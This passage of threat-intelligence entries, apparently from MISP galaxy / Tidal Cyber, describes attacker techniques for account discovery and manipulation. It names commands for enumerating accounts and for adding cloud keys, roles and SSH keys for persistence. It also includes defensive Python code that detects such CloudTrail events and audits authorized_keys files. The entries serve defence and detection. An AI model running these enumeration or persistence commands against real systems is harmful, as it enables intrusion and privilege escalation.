With authenticated access there are several tools that can be used to find accounts. The <code>Get-MsolRoleMember</code> PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.<sup>[[Microsoft msolrolemember](https://app.tidalcyber.com/references/ca28494c-d834-4afc-9237-ab78dcfc427b)]</sup><sup>[[GitHub Raindance](https://app.tidalcyber.com/references/321bba10-06c6-4c4f-a3e0-318561fa0fed)]</sup> The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command <code>az ad user list</code> will list all users within a domain.<sup>[[Microsoft AZ CLI](https://app.tidalcyber.com/references/cfd94553-272b-466b-becb-3859942bcaa5)]</sup><sup>[[Black Hills Red Teaming MS AD Azure, 2018](https://app.tidalcyber.com/references/48971032-8fa2-40ff-adef-e91d7109b859)]</sup>

The AWS command <code>aws iam list-users</code> may be used to obtain a list of users in the current account while <code>aws iam list-roles</code> can obtain IAM roles that have a specified path prefix.<sup>[[AWS List Roles](https://app.tidalcyber.com/references/42ff02f9-45d0-466b-a5fa-e19c8187b529)]</sup><sup>[[AWS List Users](https://app.tidalcyber.com/references/517e3d27-36da-4810-b256-3f47147b36e3)]</sup> In GCP, <code>gcloud iam service-accounts list</code> and <code>gcloud projects get-iam-policy</code> may be used to obtain a listing of service accounts and users in a project.<sup>[[Google Cloud - IAM Servie Accounts List API](https://app.tidalcyber.com/references/3ffad706-1dac-41dd-b197-06f22fec3b30)]</sup>

The tag is: misp-galaxy:technique="Cloud Account - Duplicate"

Domain Account - Duplicate

Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.

Commands such as <code>net user /domain</code> and <code>net group /domain</code> of the [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups. [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code> may enumerate members of Active Directory groups.

The tag is: misp-galaxy:technique="Domain Account - Duplicate"

Email Account

Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).<sup>[[Microsoft Exchange Address Lists](https://app.tidalcyber.com/references/138ec24a-4361-4ce0-b78e-508c11db397c)]</sup>

In on-premises Exchange and Exchange Online, the <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.<sup>[[Microsoft getglobaladdresslist](https://app.tidalcyber.com/references/a4948a80-d11c-44ed-ae63-e3f5660463f9)]</sup><sup>[[Black Hills Attacking Exchange MailSniper, 2016](https://app.tidalcyber.com/references/adedfddc-29b7-4245-aa67-cc590acb7434)]</sup>

In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.<sup>[[Google Workspace Global Access List](https://app.tidalcyber.com/references/5104f0ea-1fb6-4260-a9b6-95922b3a8e5b)]</sup>

The tag is: misp-galaxy:technique="Email Account"

Local Account - Duplicate

Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.

Commands such as <code>net user</code> and <code>net localgroup</code> of the [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility and <code>id</code> and <code>groups</code> on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the <code>/etc/passwd</code> file. On macOS the <code>dscl . list /Users</code> command can be used to enumerate local accounts.

The tag is: misp-galaxy:technique="Local Account - Duplicate"

Account Discovery

Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).

Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.

For example, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.

The tag is: misp-galaxy:technique="Account Discovery"

Additional Cloud Credentials

Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.

For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.<sup>[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)]</sup><sup>[[Blue Cloud of Death](https://app.tidalcyber.com/references/0c764280-9d8c-4fa4-9088-170f02550d4c)]</sup><sup>[[Blue Cloud of Death Video](https://app.tidalcyber.com/references/39b0adf6-c71e-4501-b8bb-fab82718486b)]</sup> These credentials include both x509 keys and passwords.<sup>[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)]</sup> With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.<sup>[[Demystifying Azure AD Service Principals](https://app.tidalcyber.com/references/3e285884-2191-4773-9243-74100ce177c8)]</sup>

In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://app.tidalcyber.com/technique/3c4a2f3a-5877-4a27-a417-76318523657e), adversaries may generate or import their own SSH keys using either the <code>CreateKeyPair</code> or <code>ImportKeyPair</code> API in AWS or the <code>gcloud compute os-login ssh-keys add</code> command in GCP.<sup>[[GCP SSH Key Add](https://app.tidalcyber.com/references/372b6cfd-abdc-41b7-be78-4b1dc0426044)]</sup> This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.<sup>[[Expel IO Evil in AWS](https://app.tidalcyber.com/references/4c2424d6-670b-4db0-a752-868b4c954e29)]</sup><sup>[[Expel Behind the Scenes](https://app.tidalcyber.com/references/d538026c-da30-48d2-bc30-fde3776db1a8)]</sup>

Adversaries may also use the <code>CreateAccessKey</code> API in AWS or the <code>gcloud iam service-accounts keys create</code> command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://app.tidalcyber.com/technique/3c4a2f3a-5877-4a27-a417-76318523657e)).<sup>[[Rhino Security Labs AWS Privilege Escalation](https://app.tidalcyber.com/references/693e5783-4aa1-40ce-8080-cec01c3e7b59)]</sup><sup>[[Sysdig ScarletEel 2.0](https://app.tidalcyber.com/references/90e60242-82d8-5648-b7e4-def6fd508e16)]</sup> For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application’s service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.<sup>[[SpecterOps Azure Privilege Escalation](https://app.tidalcyber.com/references/5dba5a6d-465e-4489-bc4d-299a891b62f6)]</sup>

In AWS environments, adversaries with the appropriate permissions may also use the sts:GetFederationToken API call to create a temporary set of credentials tied to the permissions of the original user account. These credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated. <sup>[[Crowdstrike AWS User Federation Persistence](https://app.tidalcyber.com/references/8c4f806c-b6f2-5bde-8525-05da6692e59c)]</sup>

The tag is: misp-galaxy:technique="Additional Cloud Credentials"

Additional Cloud Roles

An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.<sup>[[AWS IAM Policies and Permissions](https://app.tidalcyber.com/references/9bb520fa-0c4f-48aa-8b0a-8f1d42ee1d0c)]</sup><sup>[[Google Cloud IAM Policies](https://app.tidalcyber.com/references/b23a0df2-923d-4a5d-a40c-3ae218a0be94)]</sup><sup>[[Microsoft Support O365 Add Another Admin, October 2019](https://app.tidalcyber.com/references/c31cfc48-289e-42aa-8046-b41261fdeb96)]</sup><sup>[[Microsoft O365 Admin Roles](https://app.tidalcyber.com/references/8014a0cc-f793-4d9a-a2cc-ef9e9c5a826a)]</sup> With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).<sup>[[Expel AWS Attacker](https://app.tidalcyber.com/references/089f6f4e-370c-49cb-a35c-c80be0fd39de)]</sup> <sup>[[Microsoft O365 Admin Roles](https://app.tidalcyber.com/references/8014a0cc-f793-4d9a-a2cc-ef9e9c5a826a)]</sup>

This account modification may immediately follow [Create Account](https://app.tidalcyber.com/technique/55bcf759-a0bf-47e9-99f8-4e8ca997e6ce) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.

For example, in AWS environments, an adversary with appropriate permissions may be able to use the <code>CreatePolicyVersion</code> API to define a new version of an IAM policy or the <code>AttachUserPolicy</code> API to attach an IAM policy with additional or distinct permissions to a compromised user account.<sup>[[Rhino Security Labs AWS Privilege Escalation](https://app.tidalcyber.com/references/693e5783-4aa1-40ce-8080-cec01c3e7b59)]</sup>
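Detection logic for the AWS calls named under Additional Cloud Credentials (CreateAccessKey, CreateKeyPair, ImportKeyPair, GetFederationToken) and Additional Cloud Roles (AttachUserPolicy, CreatePolicyVersion), as an added example that is not part of the MISP galaxy or ATT&CK material. It runs over constructed CloudTrail-style records; the field names (eventName, userIdentity, requestParameters) are the standard CloudTrail ones, the severity rules are assumptions a defender would tune.

```python
"""Added example (not from the page): flag CloudTrail records matching the
credential- and role-addition API calls named in the technique text."""
import json
from dataclasses import dataclass
from typing import Optional

# eventName values for the AWS calls the text names; membership in these sets
# makes a record worth a look, classify() decides how serious it is.
CREDENTIAL_EVENTS = {"CreateAccessKey", "CreateKeyPair", "ImportKeyPair",
                     "GetFederationToken"}
ROLE_EVENTS = {"AttachUserPolicy", "CreatePolicyVersion"}


@dataclass
class Finding:
    event_name: str
    actor: str      # principal that made the call
    target: str     # account, key or policy the call affected
    severity: str   # "high" or "medium" (assumed scale)
    reason: str


def actor_of(event: dict) -> str:
    """Caller name: IAM users carry userName, other identity types only an ARN."""
    ident = event.get("userIdentity", {})
    return ident.get("userName") or ident.get("arn", "unknown")


def classify(event: dict) -> Optional[Finding]:
    name = event.get("eventName", "")
    if name not in CREDENTIAL_EVENTS | ROLE_EVENTS:
        return None
    params = event.get("requestParameters") or {}
    actor = actor_of(event)

    if name == "CreateAccessKey":
        # userName omitted means the caller created a key for itself; a key
        # minted for another principal is the escalation case in the text.
        target = params.get("userName") or actor
        if target != actor:
            return Finding(name, actor, target, "high",
                           "access key created for a different principal")
        return Finding(name, actor, target, "medium",
                       "new long-lived access key on the caller's own account")

    if name in ("CreateKeyPair", "ImportKeyPair"):
        return Finding(name, actor, params.get("keyName", "?"), "medium",
                       "SSH key pair added to the account")

    if name == "GetFederationToken":
        duration = int(params.get("durationSeconds", 43200))  # API default 12h
        severity = "high" if duration > 3600 else "medium"
        return Finding(name, actor, params.get("name", "?"), severity,
                       f"federated credentials valid for {duration}s survive key deactivation")

    if name == "AttachUserPolicy":
        target = params.get("userName", "?")
        policy = params.get("policyArn", "")
        self_grant = target == actor
        severity = "high" if self_grant or policy.endswith("/AdministratorAccess") else "medium"
        return Finding(name, actor, target, severity,
                       f"policy {policy} attached" + (" by the user to itself" if self_grant else ""))

    # CreatePolicyVersion: only a version set as default changes live permissions
    policy = params.get("policyArn", "?")
    severity = "high" if params.get("setAsDefault") else "medium"
    return Finding(name, actor, policy, severity,
                   "new policy version " + ("set as default" if severity == "high" else "staged, not default"))


def scan(cloudtrail_json: str) -> list:
    """Run classify() over a CloudTrail log file body ({"Records": [...]})."""
    records = json.loads(cloudtrail_json).get("Records", [])
    return [f for f in map(classify, records) if f is not None]


# Constructed sample records (not real logs), trimmed to the fields used above.
SAMPLE_LOG = json.dumps({"Records": [
    {"eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
     "userIdentity": {"type": "IAMUser", "userName": "alice"},
     "requestParameters": {"userName": "svc-backup"}},
    {"eventSource": "iam.amazonaws.com", "eventName": "AttachUserPolicy",
     "userIdentity": {"type": "IAMUser", "userName": "alice"},
     "requestParameters": {"userName": "alice",
                           "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}},
    {"eventSource": "sts.amazonaws.com", "eventName": "GetFederationToken",
     "userIdentity": {"type": "IAMUser", "userName": "alice"},
     "requestParameters": {"name": "tmp-session", "durationSeconds": 129600}},
    {"eventSource": "iam.amazonaws.com", "eventName": "CreatePolicyVersion",
     "userIdentity": {"type": "IAMUser", "userName": "bob"},
     "requestParameters": {"policyArn": "arn:aws:iam::111122223333:policy/app-policy",
                           "setAsDefault": False}},
    {"eventSource": "iam.amazonaws.com", "eventName": "ListUsers",
     "userIdentity": {"type": "IAMUser", "userName": "bob"},
     "requestParameters": None},
]})

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.severity}] {f.event_name} by {f.actor} -> {f.target}: {f.reason}")
```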

The tag is: misp-galaxy:technique="Additional Cloud Roles"

Additional Container Cluster Roles

An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account.<sup>[[Kubernetes RBAC](https://app.tidalcyber.com/references/37c0e0e1-cc4d-5a93-b8a0-224f031b7324)]</sup><sup>[[Aquasec Kubernetes Attack 2023](https://app.tidalcyber.com/references/6d6e2fc8-9806-5480-bfaa-a43a962a4980)]</sup> Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions.<sup>[[Kuberentes ABAC](https://app.tidalcyber.com/references/7f960599-a3d6-53bb-91ff-f0e6117a30ed)]</sup>

This account modification may immediately follow [Create Account](https://app.tidalcyber.com/technique/55bcf759-a0bf-47e9-99f8-4e8ca997e6ce) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) that they have compromised.

Note that where container orchestration systems are deployed in cloud environments, as with Google Kubernetes Engine, Amazon Elastic Kubernetes Service, and Azure Kubernetes Service, cloud-based role-based access control (RBAC) assignments or ABAC policies can often be used in place of or in addition to local permission assignments.<sup>[[Google Cloud Kubernetes IAM](https://app.tidalcyber.com/references/e8ee3ac6-ae7c-5fd3-a339-b579a419dd96)]</sup><sup>[[AWS EKS IAM Roles for Service Accounts](https://app.tidalcyber.com/references/b2452f0e-93b0-55b7-add8-8338d171f0bf)]</sup><sup>[[Microsoft Azure Kubernetes Service Service Accounts](https://app.tidalcyber.com/references/bf374b41-b2a3-5c07-bf84-9ea0e1a9e6c5)]</sup> In these cases, this technique may be used in conjunction with [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1).

The tag is: misp-galaxy:technique="Additional Container Cluster Roles"

Additional Email Delegate Permissions

Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account.

For example, the <code>Add-MailboxPermission</code> [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.<sup>[[Microsoft - Add-MailboxPermission](https://app.tidalcyber.com/references/b8d40efb-c78d-47dd-9d83-e5a31af73691)]</sup><sup>[[FireEye APT35 2018](https://app.tidalcyber.com/references/71d3db50-4a20-4d8e-a640-4670d642205c)]</sup><sup>[[Crowdstrike Hiding in Plain Sight 2018](https://app.tidalcyber.com/references/8612fb31-5806-47ca-ba43-265a590b61fb)]</sup> In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.<sup>[[Gmail Delegation](https://app.tidalcyber.com/references/dfd28a01-56ba-4c0c-9742-d8b1db49df06)]</sup><sup>[[Google Ensuring Your Information is Safe](https://app.tidalcyber.com/references/ad3eda19-08eb-4d59-a2c9-3b5ed8302205)]</sup>

Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.<sup>[[Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452](https://app.tidalcyber.com/references/7aa5c294-df8e-4994-9b9e-69444d75ef37)]</sup>

This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b)), so the messages evade spam/phishing detection mechanisms.<sup>[[Bienstock, D. - Defending O365 - 2019](https://app.tidalcyber.com/references/4866e6c3-c1b2-4131-bd8f-0ac228168a10)]</sup>

The tag is: misp-galaxy:technique="Additional Email Delegate Permissions"

Device Registration

Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.

MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.<sup>[[CISA MFA PrintNightmare](https://app.tidalcyber.com/references/fa03324e-c79c-422e-80f1-c270fd87d4e2)]</sup><sup>[[DarkReading FireEye SolarWinds](https://app.tidalcyber.com/references/a662c764-8954-493f-88e5-e022e093a785)]</sup> In some cases, the MFA self-enrollment process may require only a username and password to enroll the account’s first device or to enroll a device to an inactive account. <sup>[[Mandiant APT29 Microsoft 365 2022](https://app.tidalcyber.com/references/e141408e-d22b-58e4-884f-0cbff25444da)]</sup>

Similarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.<sup>[[AADInternals - Device Registration](https://app.tidalcyber.com/references/978b408d-f9e9-422c-b2d7-741f6cc298d4)]</sup><sup>[[AADInternals - Conditional Access Bypass](https://app.tidalcyber.com/references/832841a1-92d1-4fcc-90f7-afbabad84aec)]</sup><sup>[[Microsoft DEV-0537](https://app.tidalcyber.com/references/2f7a59f3-620d-4e2e-8595-af96cd4e16c3)]</sup>

Devices registered in Azure AD may be able to conduct [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.<sup>[[Microsoft - Device Registration](https://app.tidalcyber.com/references/3f42fc18-2adc-46ef-ae0a-c2d530518435)]</sup> Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://app.tidalcyber.com/technique/03619027-8a54-4cb2-8f1d-38d476edbdd8) on an Azure AD tenant by registering a large number of devices.<sup>[[AADInternals - BPRT](https://app.tidalcyber.com/references/19af3fce-eb57-4e67-9678-1968e9ea9677)]</sup>

The tag is: misp-galaxy:technique="Device Registration"

SSH Authorized Keys

Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The <code>authorized_keys</code> file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user’s home directory under <code><user-home>/.ssh/authorized_keys</code>.<sup>[[SSH Authorized Keys](https://app.tidalcyber.com/references/ff100b76-894e-4d7c-9b8d-5f0eedcf59cc)]</sup> Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under <code>/etc/ssh/sshd_config</code>.

Adversaries may modify SSH <code>authorized_keys</code> files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or REST API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.<sup>[[Google Cloud Add Metadata](https://app.tidalcyber.com/references/eba4b850-8784-4da2-b87d-54b5bd0f58d6)]</sup><sup>[[Google Cloud Privilege Escalation](https://app.tidalcyber.com/references/3dc4b69c-8cae-4489-8df2-5f55419fb3b1)]</sup> Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.<sup>[[Azure Update Virtual Machines](https://app.tidalcyber.com/references/299f231f-70d1-4c1a-818f-8a01cf65382c)]</sup> This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.<sup>[[Venafi SSH Key Abuse](https://app.tidalcyber.com/references/cba14230-13bc-47ad-8f3f-d798217657bd)]</sup><sup>[[Cybereason Linux Exim Worm](https://app.tidalcyber.com/references/9523d8ae-d749-4c25-8c7b-df2d8c25c3c8)]</sup> It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.

Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user.

SSH keys can also be added to accounts on network devices, such as with the ip ssh pubkey-chain [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) command.<sup>[[cisco_ip_ssh_pubkey_ch_cmd](https://app.tidalcyber.com/references/c6ffe974-f304-598c-bc4d-5da607c73802)]</sup>
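A defender-side audit of the file this technique targets, as an added example that is not part of the galaxy or the ATT&CK text: it parses <code>authorized_keys</code> entries (including the optional options prefix), fingerprints each key the way OpenSSH displays it, compares the fingerprints with a baseline recorded at provisioning time, and reads the effective <code>PubkeyAuthentication</code> value from <code>sshd_config</code> using sshd's first-occurrence rule. All keys, fingerprints and file contents are constructed sample data.

```python
"""Audit an OpenSSH authorized_keys file against a baseline of approved keys.

Added example, not part of the MISP galaxy or ATT&CK text. All sample keys,
fingerprints and config contents below are constructed.
"""
import base64
import hashlib
import shlex
import struct

KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}


def parse_authorized_keys_line(line):
    """Split one entry into (options, key_type, blob, comment).

    Entry format: [options] key-type base64-blob [comment]. Options may carry
    quoted values such as command="...", so shlex does the tokenising. Returns
    None for blank/comment lines; raises ValueError for unrecognised entries.
    """
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    tokens = shlex.split(line)  # raises ValueError on unbalanced quotes
    for idx in (0, 1):  # the key type is the first or second token
        if idx + 1 < len(tokens) and tokens[idx] in KEY_TYPES:
            options = tokens[0] if idx == 1 else ""
            return options, tokens[idx], tokens[idx + 1], " ".join(tokens[idx + 2:])
    raise ValueError("no recognised key type")


def fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint of a base64 public key blob."""
    raw = base64.b64decode(blob_b64, validate=True)
    digest = hashlib.sha256(raw).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def blob_key_type(blob_b64):
    """Key type embedded in the wire-format blob (first length-prefixed string)."""
    raw = base64.b64decode(blob_b64, validate=True)
    (length,) = struct.unpack_from(">I", raw, 0)
    return raw[4:4 + length].decode()


def audit_authorized_keys(text, approved_fingerprints):
    """Return findings as dicts {'line', 'key_type', 'comment', 'reasons'}."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        key_type, comment, reasons = None, "", []
        try:
            parsed = parse_authorized_keys_line(line)
            if parsed is None:
                continue
            _options, key_type, blob, comment = parsed
            if blob_key_type(blob) != key_type:
                reasons.append("key type mismatch")
            if fingerprint(blob) not in approved_fingerprints:
                reasons.append("key not in baseline")
        except (ValueError, struct.error):  # binascii.Error is a ValueError
            reasons.append("unparseable entry")
        if reasons:
            findings.append({"line": lineno, "key_type": key_type,
                             "comment": comment, "reasons": reasons})
    return findings


def sshd_directive(config_text, keyword, default):
    """Effective value of a global sshd_config directive.

    sshd honours the first occurrence of a keyword (case-insensitive), and
    global directives must precede any Match block, so parsing stops there.
    """
    for raw in config_text.splitlines():
        parts = raw.split("#", 1)[0].split(None, 1)
        if not parts:
            continue
        if parts[0].lower() == "match":
            break
        if len(parts) == 2 and parts[0].lower() == keyword.lower():
            return parts[1].strip()
    return default


def make_blob(key_type, key_bytes):
    """Build an SSH wire-format public key blob (constructed test data only)."""
    raw = b"".join(struct.pack(">I", len(s)) + s for s in (key_type.encode(), key_bytes))
    return base64.b64encode(raw).decode()


# Constructed sample data: the key bytes are arbitrary, not real keys.
ADMIN_BLOB = make_blob("ssh-ed25519", bytes(range(32)))
ROGUE_BLOB = make_blob("ssh-ed25519", bytes(32))
APPROVED = {fingerprint(ADMIN_BLOB)}  # baseline recorded at provisioning time
SAMPLE_AUTHORIZED_KEYS = f"""# approved admin key
from="10.0.0.0/8" ssh-ed25519 {ADMIN_BLOB} admin@bastion
ssh-ed25519 {ROGUE_BLOB}
ssh-rsa {ROGUE_BLOB} mismatch@example
not-a-key-line
"""
SAMPLE_SSHD_CONFIG = """
#PubkeyAuthentication no
PubkeyAuthentication yes
PubkeyAuthentication no   # sshd ignores this later duplicate
"""
```

Running `audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, APPROVED)` reports the two unapproved entries and the malformed line while leaving the baselined admin key alone; the same functions work on real `~/.ssh/authorized_keys` and `/etc/ssh/sshd_config` contents.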

The tag is: misp-galaxy:technique="SSH Authorized Keys"

Account Manipulation

Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials.

In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).

The tag is: misp-galaxy:technique="Account Manipulation"

Acquire Access

Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.<sup>[[Microsoft Ransomware as a Service](https://app.tidalcyber.com/references/833018b5-6ef6-5327-9af5-1a551df25cd2)]</sup><sup>[[CrowdStrike Access Brokers](https://app.tidalcyber.com/references/0f772693-e09d-5c82-85c2-77f5fee39ef0)]</sup><sup>[[Krebs Access Brokers Fortune 500](https://app.tidalcyber.com/references/37d237ae-f0a8-5b30-8f97-d751c1560391)]</sup> In some cases, adversary groups may form partnerships to share compromised systems with each other.<sup>[[CISA Karakurt 2022](https://app.tidalcyber.com/references/5a9a79fa-532b-582b-9741-cb732803cd22)]</sup>

Footholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., [Web Shell](https://app.tidalcyber.com/technique/05a5318f-476d-44c1-8a85-9466295d31dd)) or established access via [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4). In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.<sup>[[Microsoft Ransomware as a Service](https://app.tidalcyber.com/references/833018b5-6ef6-5327-9af5-1a551df25cd2)]</sup>

By leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.<sup>[[Microsoft Ransomware as a Service](https://app.tidalcyber.com/references/833018b5-6ef6-5327-9af5-1a551df25cd2)]</sup><sup>[[CrowdStrike Access Brokers](https://app.tidalcyber.com/references/0f772693-e09d-5c82-85c2-77f5fee39ef0)]</sup>

In some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf), [Multi-Factor Authentication Interception](https://app.tidalcyber.com/technique/600d45ec-cb9c-47b8-ae94-326471ebb007), or even [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f).

Note: while this technique is distinct from other behaviors such as [Purchase Technical Data](https://app.tidalcyber.com/technique/56ab198f-f8bb-4fe9-bd85-5975d4d3863b) and [Credentials](https://app.tidalcyber.com/technique/e5d9c785-61bd-483f-b2ac-5bd9a8641b22), they may often be used in conjunction (especially where the acquired foothold requires [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).

The tag is: misp-galaxy:technique="Acquire Access"

Botnet - Duplicate

